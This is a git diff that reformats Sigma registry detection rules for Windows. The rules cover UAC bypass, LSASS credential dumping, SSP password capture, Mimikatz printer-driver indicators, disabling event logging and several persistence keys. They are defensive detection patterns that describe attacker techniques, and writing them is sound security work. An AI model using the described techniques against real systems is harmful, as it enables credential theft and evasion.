--- a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml +++ b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml @@ -1,14 +1,12 @@ title: PUA - Sysinternals Tools Execution - Registry id: c7da8edc-49ae-45a2-9e61-9fd860e4e73d related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived - - id: 9841b233-8df8-4ad7-9133-b0b4402a9014 - type: obsoletes + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived + - id: 9841b233-8df8-4ad7-9133-b0b4402a9014 + type: obsoletes status: test -description: Detects the execution of some potentially unwanted tools such as PsExec, - Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" - registry key. +description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key. references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Nasreddine Bencherchali (Nextron Systems) @@ -25,7 +23,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: - \Active Directory Explorer - \Handle @@ -40,7 +38,6 @@ detection: ObjectName|endswith: \EulaAccepted condition: registry_add and selection falsepositives: - - Legitimate use of SysInternals tools. Filter the legitimate paths used in your - environment + - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_event/registry_event_apt_oilrig_mar18.yml b/sigma/builtin/registry/registry_event/registry_event_apt_oilrig_mar18.yml index e042cfe1e..90bdcf1e2 100644 --- a/sigma/builtin/registry/registry_event/registry_event_apt_oilrig_mar18.yml +++ b/sigma/builtin/registry/registry_event/registry_event_apt_oilrig_mar18.yml @@ -1,19 +1,17 @@ title: OilRig APT Registry Persistence id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 related: - - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 - type: similar - - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 - type: similar - - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 - type: similar + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System + type: similar + - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security + type: similar + - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation + type: similar status: test -description: Detects OilRig registry persistence as reported by Nyotron in their March - 2018 report +description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report references: - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2023/03/08 tags: diff --git a/sigma/builtin/registry/registry_event/registry_event_bypass_via_wsreset.yml b/sigma/builtin/registry/registry_event/registry_event_bypass_via_wsreset.yml index b16177704..f216e7942 100644 --- a/sigma/builtin/registry/registry_event/registry_event_bypass_via_wsreset.yml +++ b/sigma/builtin/registry/registry_event/registry_event_bypass_via_wsreset.yml @@ -1,9 +1,7 @@ title: UAC Bypass Via Wsreset id: 6ea3bf32-9680-422d-9f50-e90716b12a66 status: test -description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated - with the Windows Store. It will run a binary file contained in a low-privilege - registry. +description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry. references: - https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly - https://lolbas-project.github.io/lolbas/Binaries/Wsreset diff --git a/sigma/builtin/registry/registry_event/registry_event_cmstp_execution_by_registry.yml b/sigma/builtin/registry/registry_event/registry_event_cmstp_execution_by_registry.yml index a2629b922..d40cd36f9 100644 --- a/sigma/builtin/registry/registry_event/registry_event_cmstp_execution_by_registry.yml +++ b/sigma/builtin/registry/registry_event/registry_event_cmstp_execution_by_registry.yml @@ -1,8 +1,7 @@ title: CMSTP Execution Registry Event id: b6d235fc-1d38-4b12-adbe-325f06728f37 status: stable -description: Detects various indicators of Microsoft Connection Manager Profile Installer - execution +description: Detects various indicators of Microsoft Connection Manager Profile Installer execution references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ author: Nik Seetharaman diff --git a/sigma/builtin/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml b/sigma/builtin/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml index b9247639b..67733d33e 100644 --- a/sigma/builtin/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml +++ b/sigma/builtin/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml @@ -1,8 +1,7 @@ title: Disable Security Events Logging Adding Reg Key MiniNt id: 919f2ef0-be2d-4a7a-b635-eb2b41fde044 status: test -description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, - Windows Event Log service will stopped write events. +description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events. references: - https://twitter.com/0gtweet/status/1182516740955226112 author: Ilyas Ochkov, oscd.community @@ -20,9 +19,10 @@ detection: EventID: 4657 Channel: Security selection: - - ObjectName: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt - OperationType: '%%1904' - - NewName: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt + # Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one + - ObjectName: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt + OperationType: '%%1904' + - NewName: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt condition: registry_event and selection fields: - ProcessName diff --git a/sigma/builtin/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml b/sigma/builtin/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml index e1e5803d2..6dfcf5676 100644 --- a/sigma/builtin/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml +++ b/sigma/builtin/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml @@ -1,15 +1,10 @@ title: Wdigest CredGuard Registry Modification id: 1a2d6c47-75b0-45bd-b133-2c0be75349fd status: test -description: 'Detects potential malicious modification of the property value of IsCredGuardEnabled - from - - HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred - Guard on a system. - +description: | + Detects potential malicious modification of the property value of IsCredGuardEnabled from + HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials. - - ' references: - https://teamhydra.blog/2020/08/25/bypassing-credential-guard/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) diff --git a/sigma/builtin/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml b/sigma/builtin/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml index 742106968..b560eb428 100644 --- a/sigma/builtin/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml +++ b/sigma/builtin/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml @@ -1,9 +1,7 @@ title: Esentutl Volume Shadow Copy Service Keys id: 5aad0995-46ab-41bd-a9ff-724f41114971 status: test -description: Detects the volume shadow copy service initialization and processing - via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume - are captured. +description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) diff --git a/sigma/builtin/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml b/sigma/builtin/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml index 3b02eb832..4af4d7a21 100644 --- a/sigma/builtin/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml +++ b/sigma/builtin/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml @@ -1,8 +1,7 @@ title: HybridConnectionManager Service Installation - Registry id: ac8866c7-ce44-46fd-8c17-b24acff96ca8 status: test -description: Detects the installation of the Azure Hybrid Connection Manager service - to allow remote code execution from Azure function. +description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. references: - https://twitter.com/Cyb3rWard0g/status/1381642789369286662 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) @@ -21,7 +20,7 @@ detection: selection1: ObjectName|contains: \Services\HybridConnectionManager selection2: - OperationType: '%%1905' + OperationType: '%%1905' NewValue|contains: Microsoft.HybridConnectionManager.Listener.exe condition: registry_event and (selection1 or selection2) falsepositives: diff --git a/sigma/builtin/registry/registry_event/registry_event_mal_flowcloud.yml b/sigma/builtin/registry/registry_event/registry_event_mal_flowcloud.yml index 46c39932f..406ae8a3e 100644 --- a/sigma/builtin/registry/registry_event/registry_event_mal_flowcloud.yml +++ b/sigma/builtin/registry/registry_event/registry_event_mal_flowcloud.yml @@ -18,11 +18,11 @@ detection: EventID: 4657 Channel: Security selection: - - ObjectName: - - \REGISTRY\MACHINE\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A} - - \REGISTRY\MACHINE\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027} - - \REGISTRY\MACHINE\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303} - - ObjectName|startswith: \REGISTRY\MACHINE\SYSTEM\Setup\PrintResponsor\ + - ObjectName: + - \REGISTRY\MACHINE\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A} + - \REGISTRY\MACHINE\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027} + - \REGISTRY\MACHINE\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303} + - ObjectName|startswith: \REGISTRY\MACHINE\SYSTEM\Setup\PrintResponsor\ condition: registry_event and selection falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_event/registry_event_malware_qakbot_registry.yml b/sigma/builtin/registry/registry_event/registry_event_malware_qakbot_registry.yml index 3583ba2a4..331a1af9b 100644 --- a/sigma/builtin/registry/registry_event/registry_event_malware_qakbot_registry.yml +++ b/sigma/builtin/registry/registry_event/registry_event_malware_qakbot_registry.yml @@ -1,8 +1,7 @@ title: Potential Qakbot Registry Activity id: 1c8e96cd-2bed-487d-9de0-b46c90cade56 status: experimental -description: Detects a registry key used by IceID in a campaign that distributes malicious - OneNote files +description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: Hieu Tran diff --git a/sigma/builtin/registry/registry_event/registry_event_mimikatz_printernightmare.yml b/sigma/builtin/registry/registry_event/registry_event_mimikatz_printernightmare.yml index 938138593..056c3c8b9 100644 --- a/sigma/builtin/registry/registry_event/registry_event_mimikatz_printernightmare.yml +++ b/sigma/builtin/registry/registry_event/registry_event_mimikatz_printernightmare.yml @@ -1,8 +1,7 @@ title: PrinterNightmare Mimikatz Driver Name id: ba6b9e43-1d45-4d3c-a504-1043a64c8469 status: test -description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited - in CVE-2021-1675 and CVE-2021-34527 +description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 references: - https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760 - https://www.lexjansen.com/sesug/1993/SESUG93035.pdf @@ -41,10 +40,8 @@ detection: - Gentil Kiwi - mimikatz printer - Kiwi Legit Printer - condition: registry_event and (selection or selection_alt or (selection_print - and selection_kiwi)) + condition: registry_event and (selection or selection_alt or (selection_print and selection_kiwi)) falsepositives: - - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser - printer (unlikely) + - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely) level: critical ruletype: Sigma diff --git a/sigma/builtin/registry/registry_event/registry_event_modify_screensaver_binary_path.yml b/sigma/builtin/registry/registry_event/registry_event_modify_screensaver_binary_path.yml index da623649f..fc44959f1 100644 --- a/sigma/builtin/registry/registry_event/registry_event_modify_screensaver_binary_path.yml +++ b/sigma/builtin/registry/registry_event/registry_event_modify_screensaver_binary_path.yml @@ -1,8 +1,7 @@ title: Path To Screensaver Binary Modified id: 67a6c006-3fbe-46a7-9074-2ba3b82c3000 status: test -description: Detects value modification of registry key containing path to binary - used as screensaver. +description: Detects value modification of registry key containing path to binary used as screensaver. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf diff --git a/sigma/builtin/registry/registry_event/registry_event_narrator_feedback_persistance.yml b/sigma/builtin/registry/registry_event/registry_event_narrator_feedback_persistance.yml index cdced3934..cfe8d0c5c 100644 --- a/sigma/builtin/registry/registry_event/registry_event_narrator_feedback_persistance.yml +++ b/sigma/builtin/registry/registry_event/registry_event_narrator_feedback_persistance.yml @@ -18,7 +18,7 @@ detection: EventID: 4657 Channel: Security selection1: - OperationType: '%%1906' + OperationType: '%%1906' ObjectName|endswith: \AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\DelegateExecute selection2: ObjectName|endswith: \AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\(Default) diff --git a/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml b/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml index 283da84fd..6c04190ec 100644 --- a/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml +++ b/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml @@ -1,13 +1,9 @@ title: New DLL Added to AppCertDlls Registry Key id: 6aa1d992-5925-4e9f-a49b-845e51d1de01 status: test -description: 'Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs - value in the Registry key can be abused to obtain persistence and privilege escalation - - by causing a malicious DLL to be loaded and run in the context of separate processes - on the computer. - - ' +description: | + Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation + by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. references: - http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html @@ -25,9 +21,9 @@ detection: EventID: 4657 Channel: Security selection: - - ObjectName: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Session - Manager\AppCertDlls - - NewName: HKLM\SYSTEM\CurentControlSet\Control\Session Manager\AppCertDlls + # Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one + - ObjectName: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls + - NewName: HKLM\SYSTEM\CurentControlSet\Control\Session Manager\AppCertDlls condition: registry_event and selection fields: - ProcessName diff --git a/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml b/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml index 65ab8fd42..b782c7c60 100644 --- a/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml +++ b/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml @@ -1,9 +1,7 @@ title: New DLL Added to AppInit_DLLs Registry Key id: 4f84b697-c9ed-4420-8ab5-e09af5b2345d status: test -description: DLLs that are specified in the AppInit_DLLs value in the Registry key - HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll - into every process that loads user32.dll +description: DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll references: - https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html author: Ilyas Ochkov, oscd.community, Tim Shelton @@ -20,12 +18,12 @@ detection: EventID: 4657 Channel: Security selection: - - ObjectName|endswith: - - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls - - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls - - NewName|endswith: - - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls - - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + - ObjectName|endswith: + - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + - NewName|endswith: + - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls filter: NewValue: (Empty) condition: registry_event and (selection and not filter) diff --git a/sigma/builtin/registry/registry_event/registry_event_office_test_regadd.yml b/sigma/builtin/registry/registry_event/registry_event_office_test_regadd.yml index 61d7602fc..c1fd596de 100644 --- a/sigma/builtin/registry/registry_event/registry_event_office_test_regadd.yml +++ b/sigma/builtin/registry/registry_event/registry_event_office_test_regadd.yml @@ -1,8 +1,7 @@ title: Office Application Startup - Office Test id: 3d27f6dd-1c74-4687-b4fa-ca849d128d1c status: test -description: Detects the addition of office test registry that allows a user to specify - an arbitrary DLL that will be executed every time an Office application is started +description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started references: - https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/ author: omkar72 diff --git a/sigma/builtin/registry/registry_event/registry_event_office_trust_record_modification.yml b/sigma/builtin/registry/registry_event/registry_event_office_trust_record_modification.yml index 9b1cdfd6a..7d24e7959 100644 --- a/sigma/builtin/registry/registry_event/registry_event_office_trust_record_modification.yml +++ b/sigma/builtin/registry/registry_event/registry_event_office_trust_record_modification.yml @@ -1,11 +1,10 @@ title: Windows Registry Trust Record Modification id: 295a59c1-7b79-4b47-a930-df12c15fc9c2 related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: similar + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd + type: similar status: test -description: Alerts on trust record modification within the registry, indicating usage - of macros +description: Alerts on trust record modification within the registry, indicating usage of macros references: - https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/ - http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html diff --git a/sigma/builtin/registry/registry_event/registry_event_persistence_recycle_bin.yml b/sigma/builtin/registry/registry_event/registry_event_persistence_recycle_bin.yml index 25516ed25..11bc3c188 100644 --- a/sigma/builtin/registry/registry_event/registry_event_persistence_recycle_bin.yml +++ b/sigma/builtin/registry/registry_event/registry_event_persistence_recycle_bin.yml @@ -21,9 +21,9 @@ detection: Channel: Security selection_create: NewName|contains: \CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open - OperationType: '%%1905' + OperationType: '%%1905' selection_set: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\(Default) condition: registry_event and (1 of selection_*) falsepositives: diff --git a/sigma/builtin/registry/registry_event/registry_event_portproxy_registry_key.yml b/sigma/builtin/registry/registry_event/registry_event_portproxy_registry_key.yml index a4a75875f..fd73554f0 100644 --- a/sigma/builtin/registry/registry_event/registry_event_portproxy_registry_key.yml +++ b/sigma/builtin/registry/registry_event/registry_event_portproxy_registry_key.yml @@ -1,8 +1,7 @@ title: PortProxy Registry Key id: a54f842a-3713-4b45-8c84-5f136fdebd3c status: test -description: Detects the modification of PortProxy registry key which is used for - port forwarding. For command execution see rule win_netsh_port_fwd.yml. +description: Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml. references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html - https://adepts.of0x.cc/netsh-portproxy-code/ diff --git a/sigma/builtin/registry/registry_event/registry_event_runkey_winekey.yml b/sigma/builtin/registry/registry_event/registry_event_runkey_winekey.yml index 99810a347..b2b5537f8 100644 --- a/sigma/builtin/registry/registry_event/registry_event_runkey_winekey.yml +++ b/sigma/builtin/registry/registry_event/registry_event_runkey_winekey.yml @@ -1,8 +1,7 @@ title: WINEKEY Registry Modification id: b98968aa-dbc0-4a9c-ac35-108363cbf8d5 status: test -description: Detects potential malicious modification of run keys by winekey or team9 - backdoor +description: Detects potential malicious modification of run keys by winekey or team9 backdoor references: - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html author: omkar72 @@ -19,8 +18,7 @@ detection: EventID: 4657 Channel: Security selection: - ObjectName|endswith: Software\Microsoft\Windows\CurrentVersion\Run\Backup - Mgr + ObjectName|endswith: Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr condition: registry_event and selection fields: - ProcessName diff --git a/sigma/builtin/registry/registry_event/registry_event_runonce_persistence.yml b/sigma/builtin/registry/registry_event/registry_event_runonce_persistence.yml index bed25173c..1e51e84e8 100644 --- a/sigma/builtin/registry/registry_event/registry_event_runonce_persistence.yml +++ b/sigma/builtin/registry/registry_event/registry_event_runonce_persistence.yml @@ -1,8 +1,7 @@ title: Run Once Task Configuration in Registry id: c74d7efc-8826-45d9-b8bb-f04fac9e4eff status: test -description: Rule to detect the configuration of Run Once registry key. Configured - payload can be run by runonce.exe /AlternateShellStartup +description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup references: - https://twitter.com/pabraeken/status/990717080805789697 - https://lolbas-project.github.io/lolbas/Binaries/Runonce/ @@ -20,19 +19,16 @@ detection: EventID: 4657 Channel: Security selection: - ObjectName|startswith: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed - Components + ObjectName|startswith: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components ObjectName|endswith: \StubPath filter_chrome: NewValue|startswith: '"C:\Program Files\Google\Chrome\Application\' - NewValue|contains: \Installer\chrmstp.exe" --configure-user-settings --verbose-logging - --system-level + NewValue|contains: \Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level filter_edge: NewValue|startswith: - '"C:\Program Files (x86)\Microsoft\Edge\Application\' - '"C:\Program Files\Microsoft\Edge\Application\' - NewValue|endswith: \Installer\setup.exe" --configure-user-settings --verbose-logging - --system-level --msedge --channel=stable + NewValue|endswith: \Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable condition: registry_event and (selection and not 1 of filter_*) falsepositives: - Legitimate modification of the registry key by legitimate program diff --git a/sigma/builtin/registry/registry_event/registry_event_shell_open_keys_manipulation.yml b/sigma/builtin/registry/registry_event/registry_event_shell_open_keys_manipulation.yml index 28d147641..0f527a317 100644 --- a/sigma/builtin/registry/registry_event/registry_event_shell_open_keys_manipulation.yml +++ b/sigma/builtin/registry/registry_event/registry_event_shell_open_keys_manipulation.yml @@ -1,9 +1,7 @@ title: Shell Open Registry Keys Manipulation id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 status: test -description: Detects the shell open key manipulation (exefile and ms-settings) used - for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, - slui.exe via registry keys (e.g. UACMe 33 or 62) +description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) references: - https://github.com/hfiref0x/UACME - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ @@ -25,20 +23,19 @@ detection: EventID: 4657 Channel: Security selection1: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|endswith: Classes\ms-settings\shell\open\command\SymbolicLinkValue NewValue|contains: \Software\Classes\{ selection2: ObjectName|endswith: Classes\ms-settings\shell\open\command\DelegateExecute selection3: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|endswith: - Classes\ms-settings\shell\open\command\(Default) - Classes\exefile\shell\open\command\(Default) filter_sel3: NewValue: (Empty) - condition: registry_event and (selection1 or selection2 or (selection3 and not - filter_sel3)) + condition: registry_event and (selection1 or selection2 or (selection3 and not filter_sel3)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/registry/registry_event/registry_event_silentprocessexit_lsass.yml b/sigma/builtin/registry/registry_event/registry_event_silentprocessexit_lsass.yml index 8731ad430..126da3863 100644 --- a/sigma/builtin/registry/registry_event/registry_event_silentprocessexit_lsass.yml +++ b/sigma/builtin/registry/registry_event/registry_event_silentprocessexit_lsass.yml @@ -1,11 +1,10 @@ title: Potential Credential Dumping Via LSASS SilentProcessExit Technique id: 55e29995-75e7-451a-bef0-6225e2f13597 related: - - id: 36803969-5421-41ec-b92f-8500f79c23b0 - type: similar + - id: 36803969-5421-41ec-b92f-8500f79c23b0 + type: similar status: test -description: Detects changes to the Registry in which a monitor program gets registered - to dump the memory of the lsass.exe process +description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process references: - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ diff --git a/sigma/builtin/registry/registry_event/registry_event_ssp_added_lsa_config.yml b/sigma/builtin/registry/registry_event/registry_event_ssp_added_lsa_config.yml index 913c7770d..fff1b666a 100644 --- a/sigma/builtin/registry/registry_event/registry_event_ssp_added_lsa_config.yml +++ b/sigma/builtin/registry/registry_event/registry_event_ssp_added_lsa_config.yml @@ -1,8 +1,7 @@ title: Security Support Provider (SSP) Added to LSA Configuration id: eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc status: test -description: Detects the addition of a SSP to the registry. Upon a reboot or API call, - SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. +description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. references: - https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/ author: iwillkeepwatch @@ -21,8 +20,7 @@ detection: selection_registry: ObjectName: - \REGISTRY\MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages - - \REGISTRY\MACHINE\System\CurrentControlSet\Control\Lsa\OSConfig\Security - Packages + - \REGISTRY\MACHINE\System\CurrentControlSet\Control\Lsa\OSConfig\Security Packages exclusion_images: ProcessName: - C:\Windows\system32\msiexec.exe diff --git a/sigma/builtin/registry/registry_event/registry_event_stickykey_like_backdoor.yml b/sigma/builtin/registry/registry_event/registry_event_stickykey_like_backdoor.yml index b4451d1b6..99517fc3e 100644 --- a/sigma/builtin/registry/registry_event/registry_event_stickykey_like_backdoor.yml +++ b/sigma/builtin/registry/registry_event/registry_event_stickykey_like_backdoor.yml @@ -1,9 +1,7 @@ title: Sticky Key Like Backdoor Usage - Registry id: baca5663-583c-45f9-b5dc-ea96a22ce542 status: test -description: Detects the usage and installation of a backdoor that uses an option - to register a malicious debugger for built-in tools that are accessible in the - login screen +description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ diff --git a/sigma/builtin/registry/registry_event/registry_event_susp_atbroker_change.yml b/sigma/builtin/registry/registry_event/registry_event_susp_atbroker_change.yml index 560f20432..047205340 100644 --- a/sigma/builtin/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/sigma/builtin/registry/registry_event/registry_event_susp_atbroker_change.yml @@ -1,8 +1,7 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b status: test -description: Detects creation/modification of Assistive Technology applications and - persistence with usage of 'at' +description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ diff --git a/sigma/builtin/registry/registry_event/registry_event_susp_download_run_key.yml b/sigma/builtin/registry/registry_event/registry_event_susp_download_run_key.yml index 23424d31b..b5dd817ee 100644 --- a/sigma/builtin/registry/registry_event/registry_event_susp_download_run_key.yml +++ b/sigma/builtin/registry/registry_event/registry_event_susp_download_run_key.yml @@ -1,8 +1,7 @@ title: Suspicious Run Key from Download id: 9c5037d1-c568-49b3-88c7-9846a5bdc2be status: test -description: Detects the suspicious RUN keys created by software located in Download - or temporary Outlook/Internet Explorer directories +description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories references: - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/ author: Florian Roth (Nextron Systems) 